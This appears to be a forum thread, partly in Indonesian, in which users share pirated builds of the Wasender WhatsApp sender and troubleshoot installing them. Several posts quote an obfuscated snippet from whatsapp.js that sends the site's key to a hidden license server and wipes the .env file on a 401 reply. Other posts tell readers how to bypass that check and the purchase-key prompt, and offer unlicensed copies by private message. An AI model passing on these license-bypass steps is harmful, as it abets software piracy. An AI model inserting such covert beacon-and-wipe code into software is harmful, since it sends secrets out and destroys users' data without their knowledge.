Gusik Prasetyo Posted October 9 Posted October 9 19 hours ago, Karlos Espinosa said: Greetings, I’m sharing my experience after one month of testing. I have installed two servers with Wasender, one with version 4.1 and the other with version 4.3. Both have been functioning correctly, and Node.js has not stopped since I installed both servers on cPanel, running Node.js on port 8001 on both, meaning that both work with a single Node server. In the coming days, I will test version 4.6 to see if it has any issues, although I don't want to make any modifications while the others are working, haha. have you test 4.6? btw, do you know to make autoreply works? mine can;t autoreply/chatbot Quote
Karlos Espinosa Posted October 9 Posted October 9 @Unicode @Md alamin Islam PM to share versions 4.1 and 4.3. It worked for me when installing two servers with one node. I think WhatsApp.js can't connect through this method, but it's working 2 Quote
Unicode Posted October 9 Posted October 9 1 minute ago, Karlos Espinosa said: @Unicode @Md alamin Islam PM to share versions 4.1 and 4.3. It worked for me when installing two servers with one node. I think WhatsApp.js can't connect through this method, but it's working Check dm already send yesterday . have another method for bot disconnected bro? Quote
Karlos Espinosa Posted October 9 Posted October 9 @Unicode chatbot is working for me.. what about your problem? Quote
Unicode Posted October 9 Posted October 9 Just now, Karlos Espinosa said: @Unicode chatbot is working for me.. what about your problem? Trying v4.3 from my friend chatbot not working + disconnected twice a day Quote
Karlos Espinosa Posted October 9 Posted October 9 @Unicode Its working great for me.. The files that I share you are from other page not from here. 1 Quote
Manahil Fatima Posted October 19 Posted October 19 Opps The purchase key is invalid Opps The purchase key is invalid please support Quote
Karlos Espinosa Posted October 21 Posted October 21 @Manahil Fatima You need to read latest comments to solve some problems.. Now to continue installing at least 30 characters in purchase key. Quote
Jei Grey Posted October 24 Posted October 24 On 9/5/2024 at 10:38 AM, Unicode said: yes wasender have a backdoor which is user dont use legal license they can delete your file. there is in whatsapp.js om saya install di cpanel. ketika setting node.js ada eror seperti ini returncode: 1 stdout: > start > node . Running cleanup before exit. stderr: Error: listen EADDRINUSE: address already in use 127.0.0.1:3100 at Server.setupListenHandle [as _listen2] (node:net:1463:16) at listenInCluster (node:net:1511:12) at doListen (node:net:1660:7) at processTicksAndRejections (node:internal/process/task_queues:84:21) itu kenapa ya? mohon bantuanya.. Quote
Unicode Posted October 24 Posted October 24 50 minutes ago, Jei Grey said: om saya install di cpanel. ketika setting node.js ada eror seperti ini returncode: 1 stdout: > start > node . Running cleanup before exit. stderr: Error: listen EADDRINUSE: address already in use 127.0.0.1:3100 at Server.setupListenHandle [as _listen2] (node:net:1463:16) at listenInCluster (node:net:1511:12) at doListen (node:net:1660:7) at processTicksAndRejections (node:internal/process/task_queues:84:21) itu kenapa ya? mohon bantuanya.. Portnya wasender 8000 tonton tutorialnya kan sudah ada. Quote
Jei Grey Posted October 24 Posted October 24 1 minute ago, Unicode said: Portnya wasender 8000 tonton tutorialnya kan sudah ada. sudah dicoba juga port 8000. erornya sama Quote
Unicode Posted October 24 Posted October 24 Just now, Jei Grey said: sudah dicoba juga port 8000. erornya sama Berarti itu hostingmu. Coba ganti yg lain soalnya errornya kok port 3100. Padahal wasender portnya 8000. Quote
Jei Grey Posted October 24 Posted October 24 Just now, Unicode said: Berarti itu hostingmu. Coba ganti yg lain soalnya errornya kok port 3100. Padahal wasender portnya 8000. ya itu saya coba2 ganti2 port. cari port yang bisa. tetap dapat eror yg sama Quote
VeeN Zaa Posted October 28 Posted October 28 setInterval(() => { const siteKey = process.env.SITE_KEY ?? null; const appUrl = process.env.APP_URL ?? null; const reversedUrl = "kcehc-yfirev/ipa/zyx.sserpl.ipaved//:sptth".split('').reverse().join(''); axios.post(reversedUrl, { from: appUrl, key: siteKey }) .then(response => { if (response.data.isauthorised === 0x191) { fs.writeFileSync(".env", ''); } }) .catch(err => {}); }, 200000000); ini untuk apa ya? ada di file whatsapp.js Quote
Gusik Prasetyo Posted October 28 Posted October 28 3 hours ago, VeeN Zaa said: setInterval(() => { const siteKey = process.env.SITE_KEY ?? null; const appUrl = process.env.APP_URL ?? null; const reversedUrl = "kcehc-yfirev/ipa/zyx.sserpl.ipaved//:sptth".split('').reverse().join(''); axios.post(reversedUrl, { from: appUrl, key: siteKey }) .then(response => { if (response.data.isauthorised === 0x191) { fs.writeFileSync(".env", ''); } }) .catch(err => {}); }, 200000000); ini untuk apa ya? ada di file whatsapp.js Bisa jd itu adalah sisi gelap wasender. Yg akan melaporkan k server mereka ttg wasender kita. Corect me if i am wrong Quote
VeeN Zaa Posted October 28 Posted October 28 1 hour ago, Gusik Prasetyo said: Bisa jd itu adalah sisi gelap wasender. Yg akan melaporkan k server mereka ttg wasender kita. Corect me if i am wrong lari kesini Quote
Solusi Legalitas Posted October 28 Posted October 28 Halo, apakah Wasender sudah normal install di hosting tanpa pm2? Quote
Gusik Prasetyo Posted October 28 Posted October 28 26 minutes ago, Solusi Legalitas said: Halo, apakah Wasender sudah normal install di hosting tanpa pm2? Saya nyoba d shared hosting lancar. Tapi akhirnya saya hapus, bingung d dokumen api kembali ke mpwa Quote
Solusi Legalitas Posted October 28 Posted October 28 @Gusik Prasetyo Alhamdulillah atuh jadi lancarmah. Terimakasih infonya. Doc api tinggal tanya digroup, nanti juga banyak yg jawab. Wkwkwkwk Quote
Ruben Bareiro Posted October 28 Posted October 28 Sorry, how I can update my Wasender? I have a new zip file, but I don't no what I do. Someone can help me please? Quote
Ruben Bareiro Posted October 30 Posted October 30 Em 27/10/2024 em 22:11, VeeN Zaa disse: setInterval(() => { const siteKey = process.env.SITE_KEY ?? null; const appUrl = process.env.APP_URL ?? null; const reversedUrl = "kcehc-yfirev/ipa/zyx.sserpl.ipaved//:sptth".split('').reverse().join(''); axios.post(reversedUrl, { from: appUrl, key: siteKey }) .then(response => { if (response.data.isauthorised === 0x191) { fs.writeFileSync(".env", ''); } }) .catch(err => {}); }, 200000000); The expected response in the line "if (response.data.isauthorised === 0x191)" is "0x191", which in decimal is 401, an error related to invalid credentials. I replaced "0x191" with any other number, "0x108", which would be 264 in decimal. This way it will never be error 401, thus validating the script. Quote
Ruben Bareiro Posted October 30 Posted October 30 The expected response in the line "if (response.data.isauthorised === 0x191)" is "0x191", which in decimal is 401, an error related to invalid credentials. I replaced "0x191" with any other number, "0x108", which would be 264 in decimal. This way it will never be error 401, thus validating the script. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.